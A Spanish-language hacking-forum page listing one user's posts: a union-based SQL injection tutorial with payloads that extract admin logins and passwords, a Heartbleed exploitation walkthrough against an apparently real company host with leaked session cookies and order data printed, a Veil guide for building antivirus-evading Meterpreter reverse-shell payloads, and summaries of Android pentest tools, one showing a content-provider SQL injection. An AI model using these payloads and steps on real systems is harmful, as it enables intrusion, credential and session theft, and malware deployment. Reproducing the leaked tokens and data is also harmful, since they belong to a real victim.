Últimos Temas de: Stuxnet - Página 1

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

17 Abril 2024, 01:00 am

Tema destacado: Introducción a la Factorización De Semiprimos (RSA)

Mostrar Temas
Páginas: [1] 2 3

1	Seguridad Informática / Nivel Web / Union Based Sql Injection	en: 16 Junio 2014, 20:48 pm
0x1: Concepto: Una Inyección SQL es una vulnerabilidad centrada en consultas hacia la base de datos, suele suceder cuando se inyecta una variable de consultas desde una identidad hacia la base de datos y asi obtener directamente información del usuario administrador, todas las tablas y columnas de la web. El operador UNION se utiliza en las inyecciones SQL para unirse a una consulta, deliberadamente forjada por el consultor, a la consulta original. El resultado de la consulta realizada se unirá al resultado de la consulta original, permitiendo que el consultor obtener los valores de los campos de otras tablas. 0x2: Encontrar una página web vulnerable: Para encontrar nuestra página vulnerable utilizaremos algunos dorks. Código: news.php?ID= product.php?ID= content.php?ID= index.php?ID= Para saber si nuestra página es vulnerable agregamos ' ) \ " al final. Código: http://www.ejemplo.com/news.php?id=44' Como podemos observar es vulnerable. 0x3: Encontrar el número de columnas Para encontrar el número de columnas utilizaremos la cláusula ORDER BY. Código: http://www.ejemplo.com/news.php?id=44 ORDER BY 1-- [ No Hay Error ] http://www.ejemplo.com/news.php?id=44 ORDER BY 2-- [ No Hay Error ] http://www.ejemplo.com/news.php?id=44 ORDER BY 3-- [ No Hay Error ] http://www.ejemplo.com/news.php?id=44 ORDER BY 4-- [ No Hay Error ] http://www.ejemplo.com/news.php?id=44 ORDER BY 5-- [ No Hay Error ] http://www.ejemplo.com/news.php?id=44 ORDER BY 6-- [ No Hay Error ] http://www.ejemplo.com/news.php?id=44 ORDER BY 7-- [ No Hay Error ] http://www.ejemplo.com/news.php?id=44 ORDER BY 8-- [ No Hay Error ] http://www.ejemplo.com/news.php?id=44 ORDER BY 9-- [ No Hay Error ] http://www.ejemplo.com/news.php?id=44 ORDER BY 10-- [ Error ] Como podemos observar al hacer la consulta ORDER BY 10 muestra el siguiente error: Esto quiere decir que la columna 10 no existe, solo existen 9. 0x4: Encontrar la columna vulnerable Ahora debemos ejecutar la instrucción UNION SELECT Código: http://www.ejemplo.com/news.php?id=44 UNION SELECT 1,2,3,4,5,6,7,8,9-- Como podemos ver 4 y 5 son las columnas vulnerables... 0x5: Recopilación de Información: Nombre de la base de datos, Usuario actual, Versión SQL. Reemplazamos el número 5 por: concat(database(),0x3a,user(),0x3a,version()) Código: http://www.ejemplo.com/news.php?id=44 UNION SELECT 1,2,3,4,concat(database(),0x3a,user(),0x3a,version()),6,7,8,9-- Database Name : cecit_db_camara Current User : cecit_camara@localhost SQL Version : 5.5.32 0x6: Encontrar el nombre de las Tablas: Para encontrar los nombres de tablas, usaremos la siguiente la sintaxis: Código: http://www.ejemplo.com/news.php?id=44 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9 FROM information_schema.tables WHERE table_schema=database()-- 0x7: Encontrar el nombre de las columnas en el nombre de las tablas: Para encontrar los nombres de columnas, usaremos la siguiente la sintaxis: Código: http://www.ejemplo.com/news.php?id=44 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9 FROM information_schema.columns WHERE table_name = 0x7574696c69736174657572 Nota: para extraer esta información deben cifrar el nombre de la tabla en hexadecimal anteponiendo 0x, Para esto estoy utilizando la tabla utilisateur quedando 7574696c69736174657572. 0x8: Extraer Username y Passwords: Para extraer Username y Passwords, usaremos la siguiente la sintaxis: Código: http://www.ejemplo.com/news.php?id=44 UNION SELECT 1,2,3,group_concat(login,0x3a,password),5,6,7,8,9 FROM utilisateur--+

2	Seguridad Informática / Bugs y Exploits / Explotando Bug OpenSSL - Heartbleed	en: 12 Junio 2014, 17:39 pm
Buenas underc0de, tanto tiempo de no publicar algo por aqui. En este pequeño tutorial veremos como explotar la famosa vulverabilidad heartbleed. "Es el bug mas grande en OpenSSL, capaz de capturar y descifrar desde los nombres de usuario hasta las contraseñas, entre otra información sensible contenida en la memoria de los servidores." Formas de explotarlo. 1. Exploit: Unas de las formas de explotarlo es con el exploit: http://www.exploit-db.com/exploits/32745/ e interpretarlo con python. Uso del exploit: Código: python openssl.py sales.bbuconnect.com --port 443 > output_ssl.txt cat output_ssl.txt Resultado: Código: Connecting... Sending Client Hello... Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 86 ... received message: type = 22, ver = 0302, length = 1394 ... received message: type = 22, ver = 0302, length = 4 Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384 Received heartbeat response: Como podemos ver la página es vulnerable. Arrojandonos muchos datos sensibles. 2. Metasploit: Como siempre metasploit facilitandonos la vida, para explotarlo usaremos el módulo: openssl_heartbleed.rb --> http://1337day.com/exploits/22129 Uso: Código: use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS sales.bbuconnect.com set RPORT 443 set VERBOSE true run Resultado: Código: ______________________________________________________________________________ \| \| \| 3Kom SuperHack II Logon \| \|______________________________________________________________________________\| \| \| \| \| \| \| \| User Name: [ security ] \| \| \| \| Password: [ ] \| \| \| \| \| \| \| \| [ OK ] \| \|______________________________________________________________________________\| \| \| \| http://metasploit.pro \| \|______________________________________________________________________________\| =[ metasploit v4.8.0-dev [core:4.8 api:1.0] + -- --=[ 1154 exploits - 673 auxiliary - 182 post + -- --=[ 310 payloads - 30 encoders - 8 nops msf auxiliary(openssl_heartbleed) > set RHOSTS sales.bbuconnect.com RHOSTS => sales.bbuconnect.com msf auxiliary(openssl_heartbleed) > set RPORT 443 RPORT => 443 msf auxiliary(openssl_heartbleed) > set VERBOSE true VERBOSE => true msf auxiliary(openssl_heartbleed) > run [] 4.31.139.165:443 - Sending Client Hello... [] 4.31.139.165:443 - Sending Heartbeat... [] 4.31.139.165:443 - Heartbeat response, checking if there is data leaked... [+] 4.31.139.165:443 - Heartbeat response with leak [] 4.31.139.165:443 - Printable info leaked: @,ED!! ECECFFDCDADFDFDBDIDHEMFECACACAAA FFFDFEEMEEEHECECFHDADADDCACACAAASMB%V\MAILSLOT\BROWSEBBU2055187LTn_@@"\|,!t-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://orders.bbuconnect.com/prompt/,DanaInfo=.abcwsvtsw1y1zpM-u-9sSw98,Port=10001+QtyModifierCookie: DSSignInURL=/; DSFirstAccess=1398132759; DSLastAccess=1398132936; DSLaunchURL=2F64616E612F686F6D652F73706163652E676966; DSID=b28e87546e98e6d08303408643f3f270Connection: keep-alivePfuMFau4A\|9@6 ding: gzip, deflateHost: sales.bbuconnect.comDNT: 1Connection: Keep-AliveCookie: DSSignInURL=/; DSID=9e6dfea3018fb3ed2cddbe4fb6fcc008; DSFirstAccess=1398132571; DSLastAccess=1398132936h;+IM@M#$mRJH"p]N3uVht7e76fd5e3aa9dfebaca6107ed699f5; DSLastAccess=1398132936?>FAate_lvl=0&sticker_id=000&individual_pid=7203001339+000&pso_indicator=N&sun=-&mon=0&tue=0&wed=-&thu=0&fri=0&sat=0&row_total=0&prodId=7203001339+000&prodName=LTLEBTS+BLUEMUFF&grand_total=0&fore_cast=3&suggested_order=6&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203001340+000&pso_indicator=N&sun=-&mon=0&tue=0&wed=-&thu=0&fri=0&sat=0&row_total=0&prodId=7203001340+000&prodName=LB+CRUMB+CAKE+5P&grand_total=0&fore_cast=1&suggested_order=0&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203001342+000&pso_indicator=N&sun=-&mon=0&tue=18&wed=-&thu=0&fri=0&sat=0&row_total=18&prodId=7203001342+000&prodName=LTLEBTS+BROWNIES&grand_total=18&fore_cast=5&suggested_order=18&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203001353+000&pso_indicator=N&sun=-&mon=0&tue=18&wed=-&thu=0&fri=0&sat=0&row_total=18&prodId=7203001353+000&prodName=LTLEBTS+CHOCCPMF&grand_total=18&fore_cast=3&suggested_order=18&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203002058+052&pso_indicator=N&sun=-&mon=0&tue=0&wed=-&thu=12&fri=0&sat=0&row_total=12&prodId=7203002058+052&prodName=LB+SNDOODLE+MUFF&grand_total=12&fore_cast=4&suggested_order=12&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203002200+052&pso_indicator=N&sun=-&mon=-&tue=0&wed=-&thu=0&fri=0&sat=0&row_total=0&prodId=7203002200+052&prodName=LB+STWBYOG+MFN5P&grand_total=0&fore_cast=1&suggested_order=0&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=04-21-2014&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7087000908+ [] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(openssl_heartbleed) > 3: Nmap NSE script Para detectar si es vulnerable: --> https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse Uso: Código: nmap -p 443 --script ssl-heartbleed <tarjet> Resultado: Código: stuxnet@stuxnet:/media/Stuxnet/Pentesting/$ nmap -p 443 --script ssl-heartbleed 4.31.139.165 Starting Nmap 6.46 ( http://nmap.org ) at 2014-04-21 21:19 CST Nmap scan report for sales.bbuconnect.com (4.31.139.165) Host is up (0.13s latency). PORT STATE SERVICE 443/tcp open https \| ssl-heartbleed: \| VULNERABLE: \| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption. \| State: VULNERABLE \| Risk factor: High \| Description: \| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves. \| \| References: \| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 \| http://www.openssl.org/news/secadv_20140407.txt \|_ http://cvedetails.com/cve/2014-0160/

3	Seguridad Informática / Hacking / Veil – Evasión de Antivirus	en: 12 Junio 2014, 17:37 pm
Veil es una herramienta escrita en Python por Christopher Truncer para crear payloads de Metasploit capaces de evadir la mayoría de los antivirus. Utiliza métodos distintos para generar payloads diferentes y permite al usuario usar Pyinstaller o Py2Exe para convertir los payloads de Python a ejecutables. Descarga Veil: Código: git clone https://github.com/ChrisTruncer/Veil cd Veil python Veil.py Veil Modo de Uso Código: root@stuxnet:/media/Stuxnet/Pentesting/veil# python Veil.py ========================================================================= Veil First Run Detected... Initializing Script Setup... ========================================================================= [] Executing ./config/update.py... [>] Please enter the path of your metasploit installation: /media/Stuxnet/Pentesting/msf [] OPERATING_SYSTEM = Linux [] TERMINAL_CLEAR = clear [] VEIL_PATH = /media/Stuxnet/Pentesting/veil/ [] PAYLOAD_SOURCE_PATH = /root/veil-output/source/ [] Path '/root/veil-output/source/' Created [] PAYLOAD_COMPILED_PATH = /root/veil-output/compiled/ [] Path '/ro ot/veil-output/compiled/' Created [] TEMP_DIR = /tmp/ [] METASPLOIT_PATH = /media/Stuxnet/Pentesting/msf [] PYINSTALLER_PATH = /opt/pyinstaller-2.0/ [] MSFVENOM_OPTIONS = [] Configuration File Written To /media/Stuxnet/Pentesting/veil/config/settings.py ========================================================================= Veil \| [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ \| [Twitter]: @veilevasion ========================================================================= [!] WARNING: Official support for Kali Linux (x86) only at this time! [!] WARNING: Continue at your own risk! Main Menu 18 payloads loaded Available commands: use use a specific payload update update Veil to the latest version list list available languages/payloads info information on a specific payload exit exit Veil [>] Please enter a command: list ========================================================================= Veil \| [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ \| [Twitter]: @veilevasion ========================================================================= [!] WARNING: Official support for Kali Linux (x86) only at this time! [!] WARNING: Continue at your own risk! Available payloads: 1) c/VirtualAlloc Poor 2) c/VoidPointer Poor 3) c#/VirtualAlloc Poor 4) c#/b64SubVirtualAlloc Normal 5) native/BackdoorFactory Normal 6) native/hyperion Normal 7) native/pescrambler Normal 8) powershell/DownloadVirtualAlloc Excellent 9) powershell/PsexecVirtualAlloc Excellent 10) powershell/VirtualAlloc Excellent 11) python/AESEncrypted Excellent 12) python/ARCEncrypted Excellent 13) python/Base64Encode Excellent 14) python/DESEncrypted Excellent 15) python/FlatInjection Normal 16) python/LetterSubstitution Excellent 17) python/MeterHTTPContained Excellent 18) python/MeterHTTPSContained Excellent [>] Please enter a command: 11 ========================================================================= Veil \| [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ \| [Twitter]: @veilevasion ========================================================================= Payload: python/AESEncrypted loaded Required Options: Name Current Value Description ---- ------------- ----------- compile_to_exe Y Compile to an executable inject_method virtual [virtual]alloc or [void]pointer use_pyherion N Use the pyherion encrypter Available commands: set set a specific option value info show information about the payload help [crypters] show help menu for payload or crypters generate generate payload exit exit Veil back go to the main menu [>] Please enter a command: generate ========================================================================= Veil \| [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ \| [Twitter]: @veilevasion ========================================================================= [?] Use msfvenom or supply custom shellcode? 1 - msfvenom (default) 2 - Custom [>] Please enter the number of your choice: 1 [] Press [enter] for windows/meterpreter/reverse_tcp [] Press [tab] to list available payloads [>] Please enter metasploit payload: [>] Enter value for 'LHOST', [tab] for local IP: xxx.xxx.xxx.xxx [>] Enter value for 'LPORT': 4444 [>] Enter extra msfvenom options in OPTION=value syntax: [] Generating shellcode... ========================================================================= Veil \| [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ \| [Twitter]: @veilevasion ========================================================================= [*] Press [enter] for 'payload' [>] Please enter the base name for output files: [?] How would you like to create your payload executable? 1 - Pyinstaller (default) 2 - Py2Exe [>] Please enter the number of your choice: 1 Seleccionamos la opción 1 y finalizamos. En este momento empieza a salir varios mensajes por consola mientras genera el ejecutable y finalmente, muestra un resumen de todo. En este se puede ver la ruta en la que ha dejado el resultado. Ahora abrimos Metasploit: Código: msf> use exploit/multi/handler msf exploit(handler) > exploit

4	Seguridad Informática / Hacking / [Video Tutoriales] Exploiter.co	en: 12 Junio 2014, 17:33 pm
Exploiter.co es una empresa que se dedica a enseñarte técnicas de hacking ofensivas y defensivas, programación y mucho mas!. Disfruta la experiencia del hacking con sus video tutoriales: ¿Qué es un hacker y cómo convertirse en uno? En el primer #ExploiterCoLive hablamos de qué es realmente un hacker y como llegar a convertirse en uno, certificaciones como CEH, CISSP, programación en Python, Ruby y mucho más! ¿Cómo hacer un penetration testing? Aprende como hacer un penetration testin vde forma profesional con las mejores metodologías y herramientas 1. Hacking con Python - Introducción. Con este taller te llevaremos de cero a un nivel avanzado en hacking de la mano de python. 2. Hacking con Python - Control de flujo, funciones y modulos En la segunda parte del taller te enseñamos a darle lógica a tus programas, ahorrar código con funciones y empaquetar tus módulos. 3. Hacking con Python - Robando información de Windows Aprende a manejar ficheros y a usar el poder de Python haciendo Hacking en un entorno profesional. 4. Hacking con Python - POO y cómo la usa Sqlmap Aprende con una detallada explicación el funcionamiento de la programación orientada a objetos (POO) y como Sqlmap hace uso de ella. 5. Hacking con Python - Atacando servidores FTP En esta ocasión aprenderemos a hacer fuerza bruta a un servior FTP, detectar banners y acceso anonimo con Python.

5	Comunicaciones / Android / Revenssis Penetration Testing Suite	en: 8 Octubre 2013, 17:52 pm
Revenssis es un sistema de todos los tipos útiles de herramientas usadas en computadora y seguridad del uso del Web. Las herramientas disponibles en él incluyen: Los exploradores del App del Web, codifican/las herramientas descifran y del Hashing, laboratorio de investigación de la vulnerabilidad, laboratorio de Forensics, más las utilidades del deber-tener (Shell, las operaciones de búsqueda de SSH, de DNS/WHOIS, Traceroute, operaciones de búsqueda del DB portuario del explorador, del Spam, Netstat). http://revenssis.com/Revenssis.apk

6	Comunicaciones / Android / Bugtroid	en: 8 Octubre 2013, 17:07 pm
Bugtroid es una herramienta innovadora desarrollada por el equipo de Bugtraq-Team. Las características principales de este apk, es que cuenta con mas de 200 herramientas de Android y Linux (PRO) para realizar pentesting y forense a través de su Smarthphone o Tablet. Dispone de un menu categorizado según la naturaleza de las herramienta, pudiendo encontrar: - Anonimato - Búsqueda de Personas - Auditoría para frecuencias 802.11 (Wireless y Bluetooth) - Mapeo de Redes - Control remoto - DDOS - Sniffers - Pentesting - Seguridad - Forense - Analisis Web - Cryptografía - Fuerza Bruta - Antivirus - Sistema Desde el menú de la aplicación usted podrá: - Consultar la información de la herramienta. - Instalar la Aplicación. - Desinstalar la Aplicación. - Ejecutar la Aplicación (PRO) También dispone del apartado de configuraciones, el cual le servirá para administrar e instalar ciertos requerimientos para el correcto funcionamiento de las herramientas asi como otras funciones: - Establecer fondo de pantalla - Instalar los requisitos minimos para el funcionamiento de las herramientas - Instalar accesos directos en el escritorio (PRO) - Instalar accesos directos de la consola (PRO) - Instalación de interpretes: Perl, Python, Ruby, Php y Mysql (PRO) El equipo de Bugtraq-Team, no se hace responsable del uso que se le puedan aplicar a estas herramientas, ni al contenido de las mismas. Bugtroid Free

7	Seguridad Informática / Seguridad / Marmita - Detectando Ataques Man In The Middle	en: 4 Octubre 2013, 16:26 pm
Esta herramienta nos ayuda a detectar ataques ARP poisoning y ataques DHCP ACK Injection. funciona esnifando los paquetes de la interfaz de red seleccionada y analizando aquellos paquetes bien sean ARP o DHCP en busca de posibles ataques MITM. Cuando detecta un ataque muestra una alerta y la información del atacante. La herramienta permite varias configuraciones, pudiendo elegir los tipos de ataques que se desean detectar, si se desea que se mitiguen los ataques ARP Poisoning, así cómo la posibilidad de iniciar Marmita con Windows - algo que os recomendamos si vais de red en red. En la ventana principal además existen distintos paneles con información sobre ARP y DHCP así como todos los logs. Descarga

8	Comunicaciones / Android / OWASP GoatDroid	en: 28 Septiembre 2013, 05:57 am
OWASP GoatDroid es un proyecto que ayudará a educar en materia de seguridad a los desarrolladores de aplicaciones Android. Se trata de un entorno completamente funcional para aprender acerca de las vulnerabilidades y los fallos de seguridad en la extendida plataforma. El framework y la aplicación están basadas completamente en Java. No es necesario instalar un servidor web externo o un contenedor, aunque si necesitaremos MySQL, el SDK de Android y Eclipse. Cada servicio web corre en instancias Jetty embebidas y utiliza la implementación Jersey de JAX-RS. Instalación: 1. Como comentábamos, es necesario tener previamente instalado Mysql, JDK, Eclipse y Android SDK. 2. Lo primero que haremos es crear un dispositivo virtual con un nivel 7 de API como mínimo. 3. Después importamos la base de datos FourGoats en MySQL: 'mysql -u username -p < fourgoats.sql'. El fichero fourgoats.sql está dentro del directorio /databases de la carpeta GoatDroid. 4. Dentro de MySQL ejecutamos: 'create user 'goatboy'@'localhost' identified by 'goatdroid'' (si queremos indicar otra contraseña tendremos que cambiarla en el código fuente de goatdroid.jar y re-exportar. 5. En MySQL, ejecutamos : 'grant insert, delete, update, select on fourgoats.* to goatboy@localhost' 6. Ahora que la base de datos está configurada con las tablas y los datos de ejemplo, arrancamos goatdroid.jar haciendo clic o ejecutamos 'java -jar goatdroid.jar' 7. En el menú seleccionamos 'Configure y Edit' y añadimos las rutas de Eclipse y del SDK y los dispositivos virtuales: 8. Desplegamos la carpeta FourGoats en Apps, seleccionamos v1 y pulsamos el botón 'Iniciar servicio web': 9. Pulsamos el botón para iniciar el emulador y seleccionamos nuestro dispositivo virtual: 10. Una vez arrancado el dispositivo virtual, instalamos la aplicación pulsando el botón "Push App To Device". En caso de que fallara, podemos instalar el apk nosotros directamente: 'D:\Android\android-sdk\platform-tools>adb.exe install "d:\OWASP GoatDroid v0.1.2 BETA\goatdroid_apps\FourGoats\v1\android_app\FourGoats- Android Application.apk"' 11. Pinchamos en el icono creado para iniciar la aplicación y, antes de empezar a hacer nada, es necesario especificar el host y el puerto para conectarnos al servicio web. Para ello, pulsamo el botón 'Menú' y seleccionamos "Destination Info". 12. Por último, registramos y creamos una cuenta y nos loggeamos. Se pueden descubrir vulnerabilidades de tipo: Client-Side Injection Server-Side Authorization Issues Side Channel Information Leakage Insecure Data Storage Privacy Concerns

9	Comunicaciones / Android / Mercury: Auditoria de aplicaciones Android	en: 28 Septiembre 2013, 05:56 am
Una de las herramientas que más nos llamaron la atención de la BlackHat Europe la que presentó Tyrone Erasmus en su ponencia 'The Heavy Metal That Poisoned the Droid' (whitepaper y slides). Se llama Mercury de MWR Labs y es un framework gratuito que ayudará a los "cazadores" de bugs a encontrar vulnerabilidades, escribir exploits PoC y, en definitiva, a jugar con Android. Se trata de una herramienta que nos permitirá examinar de forma dinámica y a explotar las posibilidades de ataque de las aplicaciones que residen en un dispositivo Android. Se divide en dos partes: una aplicación servidor que requiere pocos privilegios y se instala en el teléfono y un cliente escrito en Python para interactuar con el servidor desde la línea de comandos. Características El principal objetivo de Mercury es ser una herramienta de auditoría que pueda utilizarse con muchos propósitos. Algunas de sus características nos permitirán: - Encontrar más fácilmente información relevante acerca de los vectores de ataque de una aplicación - Interactuar con los 4 endpoints IPC (actividades, broadcast receivers, proveedores de contenido y servicios) de una aplicación desde la línea de comandos con el fin de encontrar vulnerabilidades - Jugar con el sistema operativo Linux desde el punto de vista de una aplicación sin privilegios (sorprende lo mucho que se pueden ver) - Encontrar información sobre los paquetes instalados con filtros de búsqueda opcionales que permiten un mejor control - Subir y bajar ficheros sin usar ADB (¡esto incluye poder hacerlo a través de Internet también!) - Escribir nuevos módulos con exploits para las vulnerabilidades encontradas por medio de una rango de comandos predefinidos, y utilizar los módulos que otros hayan creado Requisitos previos - Teléfono o emulador con Android 2.2 o superior - PC con Linux y Python 2.7 – (el autocompletar de comandos no funciona en Windows) Instalación - Descarga el zip desde aquí http://labs.mwrinfosecurity.com/assets/254/mercury-v1.0.zip - Instala el servicio server/mercury.apk en el teléfono e inícialo: - Arranca el cliente client/mercury.py en el PC Citar ./mercury.py - Conecta con el servidor Mercury: Si tenemos conectado el teléfono al PC por USB o estamos usando un emulador, necesitaremos redireccionar el puerto 31415 (puedes hacerlo con el comando ‘adb forward tcp:31415 tcp:31415’) Si nos vamos a conectar al teléfono por la red inalámbrica, necesitaremos obtener la IP del teléfono, en nuestro caso la 192.168.1.35 - Escribimos en el cliente "connect" seguido de la dirección IP del teléfono (127.0.0.1 si utilizamos un emulador o lo tenemos conectado por USB al PC) Código: mercury: connect 192.168.1.35 Código: Commands - type help for more info -------------------------------------------- activity broadcast help packages service tools back debuggable modules provider shell Empezando a jugar con Mercury Cuando buscamos fugas de información en un dispositivo Android, los proveedores de contenido exportados son un buen comienzo. Dentro de la sección 'provider', con 'info -p null' obtendremos un listado de todos estos proveedores y sólo tendremos que ver aquellos que no requieran permisos para leerlos (Required Permission - Read: null o Required Permission - Write: null). El desarrollador de una aplicación tiene que configurar específicamente 'android:readPermission' o 'android:permission' en el proveedor de contenidos dentro del fichero 'AndroidManifest.xml' si no quiere que la información sea accesible por otras aplicaciones del dispositivo. Si no lo hace, a veces no encontraremos información delicada y otras veces encontraremos datos que al desarrollador no le gustaría que leyéramos. Código: mercury: provider mercury#provider: info -p null Package name: com.sec.android.app.callsetting Authority: com.sec.android.app.callsetting.allcalls Required Permission - Read: null Required Permission - Write: null Grant Uri Permissions: false Multiprocess allowed: false Una vez que seleccionamos la aplicación objetivo, el siguiente paso será obtener las direcciones de sus contenedores (content URI). Para ello utilizaremos el comando 'finduri': Código: mercury#provider: finduri com.sec.android.app.callsetting /system/app/CallSetting.apk: Contains no classes.dex /system/app/CallSetting.odex: content://com.sec.android.app.callsetting.allcalls/prefix_num content://com.sec.android.app.callsetting.allcalls/reject_msg content://com.sec.android.app.callsetting.allcalls/reject_num Para mostrarnos esta información el comando finduri ha tenido que seguir los siguientes pasos para la enumeración: - Encontrar la localización del fichero APK - Descomprimir el fichero classes.dex situado dentro del APK (si no lo hubiera, buscaría los ODEX del paquete) - Emplear código similar al string de UNIX para encontrar todas las cadenas válidas dentro del binario (fichero DEX u ODEX) - Filtrar la salida final parseando las cadenas con content://. Ahora que tenemos las direcciones de los contenedores, con query podemos leer su contenido. Por ejemplo: Código: mercury#provider: query content://com.sec.android.app.callsetting.allcalls/reject_msg _id \| reject_message \| edit_checked ..... 1 \| Lo siento, estoy ocupado. LLámame más tarde \| 2131165242 2 \| Estoy en una reunión \| 2131165243 3 \| Estoy en clase \| 2131165244 4 \| Estoy en el cine \| 2131165245 5 \| Estoy conduciendo \| 2131165246 E incluso realizar inyecciones SQL: Código: mercury#provider> query content://com.sec.android.app.callsetting.allcalls/prefix_num --projection "'" unrecognized token: "' FROM prefix_num": , while compiling: SELECT ' FROM prefix_num mercury#provider> query content://com.sec.android.app.callsetting.allcalls/prefix_num --projection "* FROM SQLITE_MASTER--" type \| name \| tbl_name \| rootpage \| sql ..... table \| android_metadata \| android_metadata \| 3 \| CREATE TABLE android_metadata (locale TEXT) table \| prefix_num \| prefix_num \| 4 \| CREATE TABLE prefix_num (_id INTEGER PRIMARY KEY AUTOINCREMENT, prefix_number TEXT NOT NULL,prefix_checked INTEGER) table \| sqlite_sequence \| sqlite_sequence \| 5 \| CREATE TABLE sqlite_sequence(name,seq)

10	Comunicaciones / Android / DroidSQli	en: 28 Septiembre 2013, 05:53 am
DroidSQLi es la primera herramienta de inyección MySQL automatizado para Android. Le permite probar la aplicación web basado en MySQL contra ataques de inyección SQL. DroidSQLi compatible con las técnicas de inyección siguientes: - Inyección basada Tiempo - Inyección de Ciegos - Inyección basado Error - Inyección normal Se selecciona automáticamente la mejor técnica a utilizar y emplea algunos métodos de evasión de filtros simples. Esta herramienta sin duda! va ayudar a nuestros trabajos como pentester, y seria muy bueno diseñar todo este tipo de herramientas para realizar nuestras auditorias de seguridad web desde android.

Páginas: [1] 2 3

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines